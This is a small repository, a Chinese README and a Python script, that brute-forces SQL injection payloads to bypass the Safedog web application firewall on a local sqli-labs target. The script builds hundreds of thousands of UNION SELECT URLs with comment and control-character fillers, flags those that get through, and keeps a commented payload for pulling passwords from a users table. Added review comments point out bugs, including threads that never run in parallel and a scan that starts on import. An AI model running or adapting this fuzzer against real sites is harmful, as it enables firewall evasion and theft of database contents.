├── README.md
└── fuzz安全狗.py

/README.md:
--------------------------------------------------------------------------------

# fuzz方法绕过安全狗的测试

以sqli lab 第六关为测试环境

成功bypass

注释里的payload可以成功跑出表名列名里的信息,前提要知道表名列名

information_shema里获取表名列名没有尝试,理论上利用跑出来的payload就可以查询出表名列名

安全萌新,py初学者,大佬勿喷,求star鼓励。

--------------------------------------------------------------------------------
/fuzz安全狗.py:
--------------------------------------------------------------------------------
#encoding = utf8
# NOTE(review): the line above is probably not a valid PEP 263 coding
# declaration (a space separates "coding" from "="); Python 3 assumes UTF-8
# source anyway, so it has no effect.
#
# Brute-force probe against a local "sqli lab" test target (see README).
# Every 4-token combination of filler strings from `Fuzz` is spliced into a
# MySQL versioned-comment payload (`/*!union ... select*/`); each resulting URL
# is requested, and URLs whose response body contains the marker "Dhakkan" but
# not the substring "error" are printed and collected in `s_list`.
#
# NOTE(review): there is no `if __name__ == "__main__":` guard — importing this
# module constructs the instance and starts issuing requests immediately.
import requests
from queue import Queue
import threading

# Filler tokens tried between the `union` and `select` keywords.
fuzz_zs = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00']  # comment delimiters and punctuation
fuzz_sz = ['',' ']  # nothing / a single space
# Percent-encoded control characters. %0g-%0j are not valid percent-escapes
# (g-j are not hex digits), so those four are sent as literal text.
fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j"]
Fuzz=fuzz_ch+fuzz_sz+fuzz_zs  # 26 tokens -> len(Fuzz)**4 == 456976 queued URLs

class fuzz:
    def __init__(self,root,ThreadNum=5):
        # NOTE(review): `root` and `ThreadNum` are accepted but never read; the
        # hard-coded values below are what the instance actually holds.
        self.root="http://192.168.1.109/sqli/Less-5/?id=1"
        self.ThreadNum=5
        # Fixed request headers. They are identical on every one of the
        # ~457k requests, so the User-Agent / Referer / Cookie literals below
        # are a straightforward signature for identifying this script's traffic
        # in server or WAF logs.
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20',
            'Referer': 'http://www.camel.com',
            'Cookie': 'whoami=digo8',
        }
        # Work queue shared by the workers in work(); filled eagerly here, so
        # construction alone builds all len(Fuzz)**4 URL strings in memory.
        self.task =Queue()
        for a in Fuzz:
            for b in Fuzz:
                for c in Fuzz:
                    for d in Fuzz:
                        exp=self.root+"' /*!union"+a+b+c+d+"select*/"+" 1,2,3 --+"
                        # The triple-quoted string below is an unused alternative
                        # payload kept as a note. It is an expression statement
                        # (a no-op), not a comment.
                        '''exp=self.root+"' /*!union"+a+b+c+d+"select*/"+" 1,2,password /*!from "+a+b+c+d+"users*/--+"'''
                        self.task.put(exp)
        self.s_list = []  # URLs whose response matched the check in test_url()

    def visit(self,url):
        """Fetch `url` with the fixed headers and return the response body.

        On any exception (connection failure included) a message is printed
        and "" is returned, so callers cannot distinguish an error from an
        empty response.
        """
        try:
            r = requests.get(url,headers=self.headers)
            ret=r.text
        except:  # bare except: also swallows KeyboardInterrupt / SystemExit
            print ("Fail to connect...")
            ret=""
        return ret

    def test_url(self):
        """Drain the shared queue, recording every URL whose body matches.

        A URL is kept (appended to `s_list` and printed) when the response
        contains "Dhakkan" and does not contain the substring "error".
        """
        while not self.task.empty():
            url = self.task.get()
            ret = self.visit(url)
            if "Dhakkan" in ret and not "error" in ret :
                self.s_list.append(url)
                print (url)

    def work(self):
        """Run test_url() `ThreadNum` times, then join the threads.

        NOTE(review): `target=self.test_url()` invokes test_url in the calling
        thread (draining the whole queue during the first loop iteration) and
        hands its None return value to Thread as the target, so the threads
        that are started afterwards have nothing to run.
        """
        threads = []
        for i in range(self.ThreadNum):
            t = threading.Thread(target=self.test_url())
            threads.append(t)
            t.start()
        for t in threads:
            t.join()

# Module-level side effect: the argument is ignored (see __init__) and the
# whole queue is processed as soon as this file is imported or run.
obj=fuzz("http://192.168.1.108/sqli/Less-5/?id=1")
obj.work()

--------------------------------------------------------------------------------